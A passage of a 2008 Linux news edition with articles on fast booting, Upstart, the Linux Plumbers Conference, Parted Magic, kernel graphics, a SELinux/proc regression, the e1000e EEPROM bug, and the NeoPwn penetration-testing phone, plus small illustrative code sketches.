laptops out there," Arjan said.  He suggested building
an initrd-based image to cover the remaining 5%.
Some kernel work made it possible to do
asynchronous initialization of some subsystems.
For example, the modified kernel starts the Advanced
Host Controller Interface (AHCI) initialization,
to handle storage, at the same time as the Universal
Host Controller Interface (UHCI), in order to handle
USB (fig. 3).  "We can boot the kernel probably in
half a second but we got it down to a second and we
stopped," Arjan said.  The kernel should be down to
half a second by 2.6.28, thanks to a brand-new fix
in the AHCI support, he added.
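
The gain from asynchronous initialization is easy to see with a little arithmetic.  The sketch below is not kernel code, and the durations are placeholders, since the talk gave no per-subsystem figures.  It assumes the time is spent mostly waiting on hardware, so that overlapped subsystems do not slow each other down.

```python
# Hypothetical initialization times in seconds; the talk gave no
# per-subsystem figures, so these numbers are placeholders.
INIT_SECONDS = {
    "AHCI (storage)": 0.4,
    "UHCI (USB)": 0.3,
}


def serial_time(durations):
    """Total time when each subsystem waits for the previous one."""
    return sum(durations.values())


def overlapped_time(durations):
    """Total time when all subsystems start together.

    This assumes the work is dominated by waiting on hardware, so the
    slowest subsystem alone determines when everything is ready.
    """
    return max(durations.values())


if __name__ == "__main__":
    print(round(serial_time(INIT_SECONDS), 2))  # 0.7
    print(overlapped_time(INIT_SECONDS))        # 0.4
```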

One more kernel change was a small patch to support
readahead.  The kernel now keeps track of which blocks
it has to read at boot, then makes that information
available to userspace when booting is complete.
That enables readahead, which is part of the early
boot process.
How they did it: readahead and init
Fedora uses Upstart  
as a replacement for the historic "init" that
traditionally is the first userspace program to run.
But the Intel team went back to the original init.
The order of tasks that init handles is modified
to do three things at the same time.  The first is an
"sReadahead" process, which reads blocks from
disk so that they're cached in memory.  The second is
the critical path: filesystem check, then the D-Bus
inter-process communication system,
then X, then the desktop.  The
third is a set of programs starting with the Hardware
Abstraction Layer (HAL), then the udev
manager for hot-plugged devices, then networking.
udev is used only to support devices that might
be added later—the system has a persistent,
old-school /dev directory so that boot doesn't depend
on udev.
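
The shape of that arrangement, three ordered chains running side by side, can be sketched as follows.  This is only a toy model: the chain names are labels invented here, and each "task" records that it ran instead of starting a real program.

```python
import threading

# The three chains described above.  Names are labels only; nothing
# here actually launches sReadahead, X, or any other program.
CHAINS = {
    "readahead": ["sReadahead"],
    "critical path": ["filesystem check", "D-Bus", "X", "desktop"],
    "background": ["HAL", "udev", "networking"],
}


def run_chains(chains):
    """Run every chain in its own thread; tasks within a chain stay ordered."""
    log = []
    lock = threading.Lock()

    def run(chain_name, tasks):
        for task in tasks:
            with lock:
                log.append((chain_name, task))

    threads = [threading.Thread(target=run, args=(name, tasks))
               for name, tasks in chains.items()]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return log


if __name__ == "__main__":
    for chain_name, task in run_chains(CHAINS):
        print(chain_name, task)
```

The interleaving between chains can differ from run to run, but the order within each chain is fixed, which is all the critical path needs.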
The arrangement of tasks helps get efficient use
out of the CPU.  For example, X delays for about
half a second probing for video modes, and that's
when HAL does its CPU-intensive startup (fig. 4).

In a graph of disk and CPU use, both are
at maximum for most of the boot time, thanks
to sReadahead.  When X starts, it never has to
wait to read from disk, since everything it needs
is already in cache.  sReadahead is based on Fedora Readahead,
but is modified to take advantage of
the kernel's new list of blocks read.
sReadahead is to be released next week on moblin.org,  
and the kernel patch is intended for mainline as
soon as Arjan can go over it with ext3 filesystem
maintainer Ted Ts'o.  (Ted, in the audience, offered
some suggestions for reordering blocks on disk to
speed boot even further.)
There's a hard limit of 75MB of reads in order
to boot, set by the maximum transfer speed of the
Flash storage:  3 seconds of I/O at 25MB/s.  So,
"We don't read the whole file. We read only the
pieces of the file we actually use," Arjan said.
sReadahead runs in the "idle" I/O scheduling class, so that if
anything else needs the disk it gets it.  
With readahead turned off, the system boots in seven
seconds, but with readahead, it meets the target of five.
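
Both the read limit and the read-only-what-you-use idea fit in a short sketch.  The two constants come from the talk; the extent-list format (path, offset, length) and the function names are assumptions made here, not the interface of sReadahead or of the kernel patch.

```python
import os
import tempfile

FLASH_MB_PER_S = 25   # transfer speed quoted in the talk
IO_SECONDS = 3        # seconds of I/O quoted in the talk


def read_budget_mb(mb_per_s, seconds):
    """Upper bound on data that can be read in the given time."""
    return mb_per_s * seconds


def preload(extents):
    """Read only the listed (path, offset, length) pieces of each file.

    On a typical system, reading the data through the normal file
    interface leaves it in the page cache as a side effect.
    Returns the number of bytes actually read.
    """
    total = 0
    for path, offset, length in extents:
        with open(path, "rb") as f:
            f.seek(offset)
            total += len(f.read(length))
    return total


if __name__ == "__main__":
    print(read_budget_mb(FLASH_MB_PER_S, IO_SECONDS))  # 75

    # Hypothetical extent list over a scratch file.
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"x" * 4096)
    try:
        print(preload([(tmp.name, 0, 512), (tmp.name, 2048, 1024)]))  # 1536
    finally:
        os.unlink(tmp.name)
```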
X is still problematic.  "We had to do a lot
of damage to X," Arjan said.  Some of the work
involved eliminating the C compiler run by re-using
keyboard mappings, but other work was more temporary.
The current line of X development, though, puts more
of the hardware detection and configuration into the
kernel, which should cut the total startup time.
Since part of the kernel's time budget is already
spent waiting for hardware to initialize, and it
can initialize more than one thing at a time, it's
a more efficient use of time to have the kernel
initialize the video hardware at the same time it
does USB and ATA.  X developer Keith Packard, in the
audience and also an Intel employee, offered help.
Setting the video mode in the kernel would
let the kernel initialize it at the same time as
the rest of the hardware, as shown in figure 3.
The fast-booting system does not use GDM but boots
straight to a user session, running the XFCE desktop
environment.  Instead of GDM, Arjan said later,
a distribution could boot to the desktop session of
the last user, but start the screensaver right away.
If a different user wanted to log in, he or she could
use the screensaver's "switch user" button.

In conclusion, Arjan said, "Don't settle for 'make
boot faster.'  It's the wrong question.  The question
is 'make boot fast'."  And don't make all users wait
because a few people run sendmail on their laptops
or use a filesystem that requires a module.  "Make it
so you only pay the price if you use the feature."
Distributions shouldn't have to maintain separate
initrd-based and initrd-free kernel packages, he said
later.  The kernel could try to boot initrd-free,
then fall back if for whatever reason it couldn't
see /sbin/init, as might happen if it's missing the
module needed to mount the root filesystem.
PowerTOP spawned a flurry of power-saving hacks
from all areas of the Linux software scene.  The
combination of Bootchart, readahead, and a five-second
target looks likely to set off a friendly boot time
contest among Linux people as well.  At the conference
roundup Friday, speaker Kyle McMartin announced that
both Fedora and Ubuntu have fixed some delays in
their boot process, and there was much applause.


FIGURE CREDIT: Arjan van de Ven and Auke Kok, Intel

		LPC: Upstart 1.0 plans: manifesto for a new init


Let's make two things clear about Upstart,  
a proposed replacement for the Linux "init" process.
First, it's not there to speed up boot, and second,
it's not intended to parallelize startup.  "Upstart is
not for what most people think it is for," said its
author, Scott James
Remnant, in a talk in the dbus miniconference at
the Linux Plumbers Conference.  What it is there for
is to expand the capabilities of "init" on Linux,
replace some scripts and workarounds with rules
that are intended to be easier to understand and
modify, and enable future improvements.  Remnant is
a Canonical employee, and Upstart is in Fedora
as of version 9, making it a welcome example of a
Canonical-sponsored project finding its way into
other distributions.
While Greg  
Kroah-Hartman mentioned a list of core software on the
Linux platform in his Plumbers Conference talk,
"the one thing he never put in there was init,"
Remnant said.  The Linux init, originally by Miquel
van Smoorenburg,  has been unchanged for years, and
is modeled on the System V Unix init, which is even
older.  Instead of updating it, Remnant says that, for
too long, distributions have just worked around it.
The startup process has traditionally consisted
of shell scripts, started by init, but containing
workarounds and extensions accumulated over the years.
For example, Debian has a wrapper program called
start-stop-daemon, that manages PID files, to keep
track of what process ID a daemon process ends up with.
Upstart handles that itself.
Current features of Upstart include sending
notifications for system events, for example, when a
service starts; eliminating race conditions, by
offering dependency tracking; and removing some
service startups from the critical path for boot,
again by handling dependencies.  Upstart allows a
distribution or sysadmin to spell out the critical
path in a script, and also specify dependencies.
Tracking dependencies allows distributions to
eliminate "sleep" loops from the boot sequence, and
instead take actions based on events.  
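
To make the contrast with "sleep" loops concrete, here is a toy event-driven job starter.  It is not Upstart's interface or job syntax: the class, its methods, the job names, and the "started <job>" event naming are all invented for this sketch.

```python
from collections import defaultdict, deque


class EventInit:
    """Toy event-driven job starter; not Upstart's real interface."""

    def __init__(self):
        self.waiting = defaultdict(list)  # event name -> jobs to start
        self.started = []                 # jobs in the order they started

    def start_on(self, job, event):
        """Register a job to start when the named event is emitted."""
        self.waiting[event].append(job)

    def emit(self, event):
        """Emit an event and start every job that depends on it.

        Each started job emits its own "started <job>" event, so chains
        of dependencies resolve without any sleep loops or polling.
        """
        queue = deque([event])
        while queue:
            current = queue.popleft()
            for job in self.waiting.pop(current, []):
                self.started.append(job)
                queue.append("started " + job)


if __name__ == "__main__":
    init = EventInit()
    init.start_on("networking", "started udev")
    init.start_on("udev", "startup")
    init.start_on("dbus", "startup")
    init.emit("startup")
    print(init.started)  # ['udev', 'dbus', 'networking']
```

Note that "networking" was registered first but starts last, because nothing runs until the event it depends on has actually occurred.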


Events are
not limited to the runlevel changes familiar to
sysvinit users, but can depend on other things on
the system.   But what other things?  
Future directions for Upstart could be ambitious.
For 1.0, Remnant is considering adding the
ability to do tasks based on cron-like criteria
such as "hourly."  But should Upstart really replace
cron?
Another possibly useful direction would be an "idle"
event.  The Common Unix Printing System (CUPS) is a
service that makes sense to start "30 seconds before
the user thinks of clicking on the print button,"
he said.  CUPS is not in the critical path for boot,
but needs to be running to detect printers before
the user needs them.  Should it be possible to start
non-critical services when the system becomes idle?
Even though fast boot isn't the goal of Upstart,
Remnant is optimistic about being able to help.
Some of the slow booting problems that Arjan van de
Ven and Auke Kok identified at the conference are deep
in the weeds of nested scripts, and might be smoked
out by a simpler init layout.  "To make boot fast we
have to do a bunch of different stuff.  It makes it
easy for us to do the real work," Remnant said.

		The Linux Plumbers Conference: a summary


Back in the early days of Linux, a developer wishing to meet his or her
peers at a conference had a relatively small number of alternatives.  Two
of those - Linux Expo and the Atlanta Linux Showcase - were held in the
United States.  But it has been a long time since the US has hosted a
serious developer-oriented conference - especially for developers who are
working on the lower layers of the system.  The US-based conferences died
out as a result of a combination of a number of factors, including poor
management, competition from the 
Ottawa Linux Symposium and (yes, really) LinuxWorld, and a feeling among
certain developers that becoming the next Dmitry Sklyarov would not be a
fun way to spend the rest of the year.

There is a certain appeal to overseas events, but that appeal fades more
quickly than one might expect.  The need for long-haul travel also excludes
US-based developers who are unable to arrange funding.  So, for some years,
the development community in the US has been wishing for a local
conference.  More recently, a dedicated group of Portland-based developers
led by Kristen Carlson Accardi,
with some help from the Linux Foundation, decided to do something about
it.  The result was the first edition of the Linux Plumbers Conference,
held September 17 to 19.  Staging this conference in a world
which does not lack for conferences was a bit of a risk, and the organizers
added a few risks of their own to the mix.  Looking back, your editor can
say that those risks were well repaid; the first Linux Plumbers Conference
was a great success.


The "plumbing" focus of this event was well chosen.  While it is still
possible to run a system with a bare kernel and a shell as the
init process, Linux systems used for real work increasingly have a
layer of user-space software tightly wrapped around the kernel.  Quite a
bit of kernel-based functionality only works properly in the presence of a
tightly-coupled user-space component; examples include system
initialization, 3D graphics, and much more.  The kernel, along with its
collection of user-space software, makes up the "plumbing" layer which
makes everything else work.  Kernel developers have had ample opportunities
to get together in recent years, but there has been no concerted effort to
bring together the developers for the full plumbing layer until now.


The other significant change made by the LPC organizers was to do away with
the "everybody delivers a paper" format used by most conferences.  Instead,
the conference was planned as a series of 2.5-hour "microconferences," each
with a specific focus.  Each microconference, which had its own "runner,"
was able to select its own mode of operation.  They generally included a
certain number of presentations on relevant topics; in this sense, the
microconferences resemble the topic-specific tracks found at many academic
gatherings. 


Where things differ, though, is that most of the microconferences were explicitly
oriented toward discussion and problem solving.  The best speakers did not
(just) talk about their own project; they raised challenges for the group
as a whole to address.  It worked spectacularly well.  Throughout the
event, your editor saw rooms full of people who were fully engaged in the
work at hand.  The discussions had wide participation, most of the necessary
people were generally in the room, and there were relatively few bored
people checking email.  And, most importantly, a lot of real work got
done.  Developers came out of the sessions with a clear idea of what needs
to be done, agreement with others on how it was to be done, and, sometimes,
working code.

So, what did all of these developers talk about?


 Developers interested in storage talked about the iogrind tool and a
     number of outstanding problems; some
     notes from the session have been posted.

 The Audio microconference covered a wide range of issues; see this LWN article for a
     summary.

 A session on tracing saw presentations by developers of a number of
     competing technologies, followed by a focused effort to design a
     unified low-level shared relay buffer.

 The video input session, for all practical purposes, continued on and
     off through the entire conference; that group of developers, which had
     never met before, set in motion some major redesign efforts for the
     Video4Linux layer.

 The bootstrap and initialization session was dominated by Arjan van de
     Ven's five-second boot
     demonstration; having been given that challenge, developers from
     multiple distributions set about the
     task of getting their systems to boot quickly.

 A session on server management looked for solutions to a number of
     challenges facing Linux administrators.

 Kernel/user-space APIs were the topic of another lively session which,
     while perhaps concluding little, raised a lot of issues on how those
     APIs should be designed.

 The power management session concluded that the suspend/resume problem
     is solved ("if you disagree, you bought the wrong hardware") and made
     progress on a number of other problems; now, they say, all that is
     left is the coding.

 The "future displays" session pounded out the path toward kernel-based
     graphics mode setting and quite a bit more.

 And the desktop integration session, while reaching "not a lot of
     conclusions," examined a number of relevant issues; the discussion on
     Upstart from that session will be covered here separately.


Beyond that, LPC attendees could choose from a handful of more traditional
presentations, a provocative
keynote from Greg Kroah-Hartman, a rather less provocative kernel
update from your editor, a git tutorial taught by some guy named Linus, and
no shortage of evening celebrations.  All told, the Linux Plumbers
Conference was one of the most productive, interesting, and generally
worthwhile events your editor has been to in quite some time - and your
editor has been to rather more than the usual number of events.  There will
be a lot of interesting developments kicked off by this gathering, once the
exhausted attendees get some rest.  This conference is off to a good start.


And it is just a start; the organizers are already working on the 2009
edition.  It will, once again, be held in Portland.  The general format
will likely remain the same, but there will be no kernel summit before the
2009 event (the summit will be in October 2009 in Tokyo).  Instead, there
is a reasonable chance that a more traditional, presentation-oriented
conference will be planned to coincide with the 2009 Plumbers Conference.
With this new event, the active local community, and the success of this
year's conference, LPC2009 looks promising already.


After 2009, the Plumbers team hopes to take a page from the linux.conf.au
playbook and pass the event on to a new set of volunteer organizers
somewhere else in North America.  This form of organization has helped to
keep linux.conf.au vital and interesting for many years; it makes sense to
do something similar with the Linux Plumbers Conference.  Now might be a
good time for any North American community which would like to host this
event in 2010 to start thinking about how it could be done.

		The Optimistic Contributor Returns - Parted Magic Part 2


About eleven months ago, I wrote an article for
LWN about the Parted Magic Linux Live CD distribution, a distribution
with the elemental purpose of partitioning hard drives.  At that time, the
primary developer, Patrick Verner, had announced his intention to stop work
on the distribution due to lack of support from the community. I lamented
the fate of the project and wondered how many other promising projects had
died under similar circumstances.  I vowed to try and do better to support
open software myself and called upon the community at large to do the same.
Fast forward to today, and your Optimistic Contributor feels vindicated in
his self-appointed choice of title. 

Why, you may ask? Well, to put it simply, the project did not die.
To find out what happened, I spoke again with Verner on September 14th,
2008.

OC - When we last spoke in October of 2007, you had posted on your
website that development of Parted Magic would cease after version 1.9
was released. Since that time, you have released many more versions up
to 3.0 (with 3.1 on deck). What motivated you to continue the project?


PV - There was very little in the way of donations, help with code, or users
giving me at least a pat on the back. Between 1.8 and 1.9 was by far the lowest
point in this project. To this day I still think your article saved the
project, well, sort of. After your LWN article I received the best month
of donations and offers for help. The worst mistake I made was not asking
for help in the first place. Once I started asking for help and started
directly asking for small donations the project turned around at a rapid
pace. The best advice I could give anybody working on OSS projects is
to ask. People assume you like doing it for free and don't need any help.
The project makes about $400 a month now and it's nice because I can
take the family out bowling a few times a week, buy some new computer
hardware, or buy something for the house.


OC - Since development has continued, the distro seems to have evolved
at a steady pace. What features would you like to highlight, or
rather, what feature(s) are you most proud of?


PV - The best thing about Parted Magic is the fact it's not based on another
distribution. Parted Magic is its own entity and has the flexibility to
go wherever it needs to go and add whatever may be required to perform
needed tasks. There really isn't any comparison between Parted Magic
and any other distro. It's really off the wall compared to the rest.
Original thinking and process is what makes Parted Magic different and it's
what I'm most proud of.


OC - You have started what appears to be a project within a project with
MiniPM (aka Beef Drapes). What itch were you trying to scratch with
this new project?


PV - MiniPM is a small project designed to run partimage over PXE. It really
wasn't too hard to create and won't be heavily maintained. It fills a
small niche and so far it seems to do what it's supposed to and nothing
more. It's not much of a diversion. http://partedmagic.com/beef_drapes
is my test directory. It's not a separate project or fork.


OC - What do you believe will drive you to continue development on both
projects for the foreseeable future?


PV - When this project is no longer useful or donations start declining
back to 1.8 levels I'm out. I don't want to do this for free. It's fun to
work on and I really enjoy it, but how can I justify the hours spent to my
wife if I'm getting nothing tangible in return? It was always a goal of
mine to do this for a living and I'm still hopeful it could happen. All it
would take is $2 from every person that finds this project useful. I work
50+ hours a week at my day job so things happen pretty slow here. I
couldn't even imagine how fast things would happen and the quality this
project could provide if I just had more time.


OC - If you could give advice to any open source programmer on how to
keep a project going, what would you say?


PV - Enjoy what you are doing, grow a thick skin, and find motivation to do
it.


OC - How has your opinion of the open source community changed in the last 10
months?


PV - Not at all. I failed to ask, that was my problem. If you want anything
from the open source community you need to ask and give back what was given
to you.


OC -  Is there anything you would like to add?


PV - Sure. Use http://partedmagic.com/beef_drapes
and tell me what needs to be fixed before the next release. This is a big
benefit to all Parted Magic users.


Now, your Optimistic Contributor would like to take credit for helping to
save the project, but all I did was inform the community of the
situation. It was the community itself that did the actual saving. The
donations, the offers of help, just the notes of thanks were enough to keep
Verner going. Verner's response to one of my questions really resonated:
"If you want anything from the open source community you need to ask
and give back what was given to you."

I read that statement several times. After letting it sink in, I realized
how effectively Verner got straight to the point. In my previous article I
made the common statement that freedom isn't free. Verner has taken that
one step further in saying that a community isn't a community without
communication and give and take. That sounds obvious after the fact, but I
am glad Verner put the idea so clearly in my head. I can only hope (as I am
ever the Optimist) that others within the open source community receive the
same level of clarity as I have.

So what about version 3.0 itself? Just like the motivation of the project
maintainer, the project itself has undergone a bit of a revolution. Almost
the entire underpinnings have been updated or redesigned. The user
interface still looks very similar to what 1.9 was, but everything just
seems smoother and more polished than before. It is actually hard to
believe that the project is put together by a handful of individuals. The
best way to experience what the distribution is capable of (besides reading
my original article) is to take Verner's last answer to heart:
"Use http://partedmagic.com/beef_drapes
and tell me what needs to be fixed before the next release.  This is a big
benefit to all Parted Magic users."

		LPC: The future of Linux graphics


On the final day of the Linux Plumbers Conference, Keith Packard ran a
microconference dedicated to future displays.  A number of topics were
discussed there, but the key session had to do with the near-term future of
Linux video drivers.  Longtime LWN readers will be more than familiar with
the story: Linux has multiple subsystems charged with managing graphics
hardware, the user-space driver model adopted by XFree86 leads to all kinds
of problems, support for 3D graphics is not what it should be, etc.  That
whole story was recounted here, but with a notable difference: solutions
are in the final stabilization stages, and these problems will soon be
history.


There are two major components to the work which is being done: graphics
memory management and kernel-based mode setting.  A contemporary graphics
processor (GPU) is really a CPU in all respects, including the possession
of a sophisticated memory management unit.  Managing the sharing of memory
between user space, the kernel, and the GPU is fundamental to the
implementation of correct, high-performance graphics.  One year ago, the TTM subsystem looked like the
solution to the memory management problem, but TTM grew increasingly
unworkable as the understanding of the problem improved.  So now the Graphics Execution Manager (GEM)
code looks like the way forward; it is currently being prepared for merging
into the mainline kernel.


Kernel-based mode setting, instead, is meant to get user-space code out of
the business of messing around directly with the hardware.  Putting the
kernel in charge of the configuration of the video adapter has a long list
of advantages.  Suspend and resume have a much better chance of working,
for example.  Once the X server stops accessing hardware directly, it no
longer needs to run as root; having that much untrusted code running with
full privileges has made people nervous for many years.  In the current
scheme, the kernel cannot change the graphics mode if it needs to; that
means that, for example, if the system panics, a graphical user will never
see the message.  With kernel-based mode setting, the kernel can switch to
a different mode and allow the user to frantically try to read the message
before it scrolls off the screen.  Kernel-based mode setting will also make
fast user switching work much better, without the need to use a separate
virtual terminal for each user session.


One of the first topics of discussion was: how does the kernel decide when
to switch to the panic screen to show the user an important message?  There
are quite a few different paths by which the kernel can indicate distress;
should a kernel message be presented every time a WARN_ON()
condition is encountered?  There would appear to be a need to unify the
error paths in the kernel to help simplify this kind of decision.  Jesse
Barnes suggested that the kernel could simply switch on every message
emitted with printk(), on the theory that such a policy would lead
to a rapid and welcome reduction in kernel verbosity.


The real debate in this session, though, had to do with development
process.  As has been discussed
previously on LWN, much of the video driver work is done outside of the
mainline kernel tree.  We are now seeing a big chunk of that work being
prepared for a merge.  But the new mode setting interface is a big API
change which will require adjustments from user space; a new kernel
expecting to handle mode setting may not give the best results when run
with an older user space X server.  So there will be a big flag day of
sorts when everything changes and all of the new code gets run for the
first time.


Linus is not pleased with the notion of a video graphics flag day; he made
a long appeal for a more incremental approach to fixing the video driver
work.  In his opinion, the flag day will lead to a whole bunch of untested
code being made active all at once; there will certainly be design mistakes
which show up, and the whole thing will fail to work properly.  At which
point another flag day will be required.  Linus was not impressed by the
claim that Fedora users have selflessly been testing this code for
everybody; in his view, the kernel developers are not doing this testing.
He sees the whole thing as a recipe for disaster.


The real problem - and the reason for the out-of-tree development - is that
all of this work requires the creation of a number of new, complex
user-space ABIs.  That is true for both mode setting and memory management,
and the two cannot be easily separated from each other.  Until the
combination as a whole is seen to work, the video driver developers simply
cannot commit themselves to a stable user-space interface - and that means
that their code cannot be merged.


As an example, TTM was cited.  Had that code been pushed when it looked
like the right solution, there would now be even bigger problems to solve.


In summary, the graphics developers believe that the approach they are
taking is as incremental as they can make it.  Whether they convinced Linus
of that fact is unclear, but he eventually seemed to accept the plan.  He
did ask for them to push the mode setting code upstream first, but that
code cannot work without memory management support.  So GEM will go into
the mainline ahead of kernel-based mode setting.  Once everything is in the
kernel, it will be possible to boot a system with either kernel-based or
user-space mode setting, so both new and old distributions will be
supported.  Someday, in the distant future, support for mode setting in
user space can be removed.  Much sooner than that, though, we should all be
running much-improved graphics code and will have long since forgotten how
things used to be.

		Newer kernels and older SELinux policies


A subtle change in 2.6.25 recently left Andrew Morton with a less than
completely functioning system, but it also demonstrated a user-space
interface that may sometimes be overlooked: SELinux.  The problem stemmed
from a change to facilitate containers by making /proc/net into a
symbolic link, which tripped up SELinux policies that had been
written for earlier kernels.  Putting policy into user space is a guiding
principle of kernel development, but that can sometimes lead to an unexpected
need for synchronization between those policies and the kernel.


The change itself was fairly minor, making /proc/net be a symbolic
link to /proc/self/net so that containers would only see their
network devices, rather than those of the enclosing system.  But when
Morton ran a recent kernel on his Fedora Core 5 and 6 systems, he got:

Further investigation found that even ls got permission errors
when looking at /proc/net.  As is usual with mysterious
"permission denied" errors, SELinux was the underlying cause.


When the change was made, back in March, it was reviewed by the SELinux
developers, but no one noticed that it would cause an additional permission
check—on the symbolic link itself.  So, when resolving things like
/proc/net/dev or other entries in that directory, the "labels" on
the symbolic link were checked.  Of course, /proc is a synthetic
filesystem, so the labels are generated from SELinux code rather than
retrieved from extended attributes (xattrs).
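
For readers who want to look at the link for themselves, a minimal sketch
follows.  It assumes a POSIX system; the helper name link_target() is
invented for this illustration and is not part of any kernel or SELinux
interface.  It simply wraps readlink() to report where a symbolic link
such as /proc/net points.

```c
#include <stddef.h>
#include <unistd.h>

/*
 * Copy the target of the symbolic link at path into buf.
 * Returns 0 on success, or -1 if path is not a readable symbolic
 * link or its target does not fit in buf.
 * (Hypothetical helper, for illustration only.)
 */
static int link_target(const char *path, char *buf, size_t size)
{
	ssize_t n;

	if (size < 2)
		return -1;
	n = readlink(path, buf, size - 1);
	/* Treat a completely filled buffer as possible truncation. */
	if (n < 0 || (size_t)n >= size - 1)
		return -1;
	buf[n] = '\0';	/* readlink() does not NUL-terminate */
	return 0;
}
```

On a kernel where /proc/net is a symbolic link, calling
link_target("/proc/net", buf, sizeof(buf)) should fill buf with the link's
target; where /proc/net is still a directory, the call fails because
readlink() refuses anything that is not a symbolic link.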


Distributions have updated their policies to allow access to the symbolic
link—probably by noticing the SELinux denial in log messages—so
most folks never saw the problem.  As Morton found out, though, existing
distribution policy files (those shipped with FC5 and FC6, for example)
would still disallow the access.  Morton regularly runs newer
kernels with older distributions to try to catch exactly this kind of
error; he is probably one of very few, perhaps the only one, doing that.


Because the distribution-supplied kernel was being changed, some argued
that requiring users to update their SELinux policies is not an onerous
requirement.  Paul Moore puts it this way:

Maybe I'm in the minority here, but in my mind once you step away from the
distro supplied kernel (also applies to other packages, although those 
are arguably less critical) you should also bear the responsibility to 
make sure you upgrade/tweak/install whatever other bits need to be 
fixed.


Morton did not buy that argument, saying:

Nope.  Releasing a non-backward-compatible kernel.org kernel is a big
deal.

We'll do it sometimes, with long notice, much care and much deliberation.

We did it this time by sheer accident.  That's known in the trade as a
"bug".


But SELinux developer Stephen Smalley points out that permissions checks
are not normally considered part of the kernel to user space interface.  It
is something of a gray area, though.  Clearly the standard UNIX permission
checks are part of that interface, at least partially because the
kernel does handle the policy for those checks.  Since the policies that
govern the decisions about SELinux
access denial come from user space, it is a bit hard to argue that
changes to the kernel will not ripple out.  Smalley describes the problem:

I should note here that for changes to SELinux, we have gone out of our
way to avoid such breakage to date through the introduction of
compatibility switches, policy flags to enable any new checks, etc
(albeit at a cost in complexity and ever creeping compatibility code).
But changes to the rest of the kernel can just as easily alter the set
of permission checks that get applied on a given operation, and I don't
think we are always going to be able to guarantee that new kernel + old
policy will Just Work. 


One possible solution to the immediate problem was floated by Smalley:
SELinux could change the 
label that it returns for symbolic links under /proc.  It is not
clear that anyone really wants that change, and there has been no movement
to add it.   As Morton says, "people who are shipping 2.6.25-
and 2.6.26-based distros probably 
wouldn't want such a patch in their kernels anyway." 


Longer term, Eric Biederman asks about
supporting xattrs for /proc.  That would allow user space to label
the proc filesystem appropriately, removing one of the special cases.
Unfortunately, doing so would create yet another incompatibility between
newer kernels and older user spaces.  


In the end, because the bug was only seen
by Morton, many months after it was introduced, it may just be ignored.
The larger issue of how permissions checks fit into the kernel to user
space interface, though, may rear its head again.


		e1000e and the joy of development kernels


The 2.6.27-rc regression list
posted on September 21 contains - deep within the list - an entry
reading "e1000e: 2.6.27-rc1 corrupts EEPROM/NVM".   One might be forgiven
for missing it; the list of regressions is still (unfortunately) long, and
there is nothing there to indicate that it is a notable problem.  But it
is: this particular bug goes beyond breaking networking; when it bites, it
corrupts the EEPROM on the device, causing it to cease to function
forevermore (or, at least, until the user can manage to flash the EEPROM
with working code).  This is a problem which is worth fixing.


As of this writing, though, nobody seems to know what the problem is.
There was some confusion resulting from the fact that the related e1000
driver also suffered from an EEPROM corruption problem - but that turns out
to have been an entirely different bug.  The e1000 problem was fixed by
putting a lock around accesses to the EEPROM, preventing corruption caused
by concurrent access.  But something else is going on with the e1000e.


Figuring out what that "something else" is appears to be a challenge.  The
problem is not readily reproducible, and there is this little problem that
triggering the bug more than once requires the replacement of the affected
hardware.  It's not even clear which kernel versions are affected, though
it appears that only the 2.6.27 development series shows the bug.  There is
some correlation between e1000e corruptions and graphics driver crashes,
leading David Miller to pursue a hypothesis that the real culprit is
changes to the X server, but that idea has not yet been proven.  Other
developers suspect a concurrency-related problem similar to
the e1000 bug.


As of this writing, the bulk of what is known can be found in this
advisory from Mandriva.  Kernel developers are adding information to the kernel bugzilla
entry as they find it.


It has been suggested that anybody running 2.6.27 on a potentially affected
system might want to save a copy of the current EEPROM contents with a
command like:


(That assumes, of course, that the relevant device is eth0 on your
system).  With the saved data, it should be possible to recover the device
if the worst happens; without, chances are that victims will have to return
their systems to the vendor.


In one sense, this bug demonstrates that the system works.  It was caught
while the kernel was still in the stabilization phase; one can be certain
that it will be obliterated somehow before any stable 2.6.27 release comes
out.  On the other hand, the first report
of this problem hit the net on August 8; the problem was known for
over a month before distributors started responding to it and the all-out
hunt for the cause began.  That is a long time for any regression to
persist, but it is especially long when one is dealing with a regression
which has the ability to regress hardware back to a stone-age state.

The distributors have now responded; most of them have withdrawn kernels
with the affected drivers.  So far, nobody has posted tools to help
affected users recover their hardware (suggestions to use ibautil
should be ignored and forgotten about as soon as possible).  Such a tool
is forthcoming, but it would be hard to blame the relevant engineers for
focusing on fixing the problem first.  With any luck at all,
the root cause will have been isolated by the time you read this.

There is one thing that will not have changed, though.  Testers of
unstable software - especially the kernel - have often been warned that
said software can do all kinds of terrible things to their systems.  It is
easy to ignore those warnings; even -rc1 kernels actually work for most
people, most of the time.  But, as we have seen in this case, the
potential for catastrophic bugs is real.  Development code can brick your
network adapter, scramble your filesystems, open up severe security holes,
or save your documents as OOXML.  When experimenting with unstable code -
even if it has been neatly packaged by your distributor - it is always
prudent to have good backups and an even better sense of humor.

		Mobile phone or penetration tool?


The NeoPwn is a pocket-sized network penetration tool based on Linux and
free software.  The form factor should be familiar to anyone who has paid
attention to the Linux mobile phone market, as NeoPwn is based on the
OpenMoko Neo FreeRunner.  When the device starts shipping, users will be
able to do
network monitoring and penetration testing from an unobtrusive
platform—then call home with it.


NeoPwn comes with an impressive array of free software security
tools, including things like Metasploit, Aircrack-ng, WifiZoo, Wireshark, and many others.  They all
run on top of a customized Linux 2.6.24 kernel—sources to be released
when the hardware ships, which is scheduled for October 1—from the
microSD flash module.   A full Debian distribution is included on a flash
filesystem that has been
optimized for performance and size.


The company behind NeoPwn has also created a graphical interface to the system for
hardware control as well as attack automation.  The interface is meant to
reduce the need for using the command line for the most common types of attacks.
Using the tools, Wired Equivalent Privacy (WEP) keys can be cracked in 5 to
14 minutes depending on whether the network has clients connected or not.
The NeoPwn is not set up to crack Wifi Protected Access (WPA) keys on the
device itself, but it can capture the handshake for use by programs on more
powerful systems.


There are several different options for purchasing the
NeoPwn—all of them 
rather pricey.  The basic model is $699 for the phone (normally $399),
software, and some useful accessories.  One can also just purchase the
software on a 2GB microSD card for $79.  The website has a prominent
warning that might deter some, however: "Please be advised that if
you do not 
choose a complete system, you will have to program the phone's bootloader
manually for the correct microSD bootloader entry, to the NAND memory. This
can be dangerous if you do not know what you are doing!" 


The standard FreeRunner Wifi has firmware limitations that will not allow
monitoring or packet injection—pretty important capabilities for a
network security tool—so various USB Wifi cards come with the NeoPwn.
Also, since a custom kernel is used, one cannot make phone calls and do
penetration testing at the same time.  At boot time, one must choose
between the two modes.  Even with those limitations, the FreeRunner seems
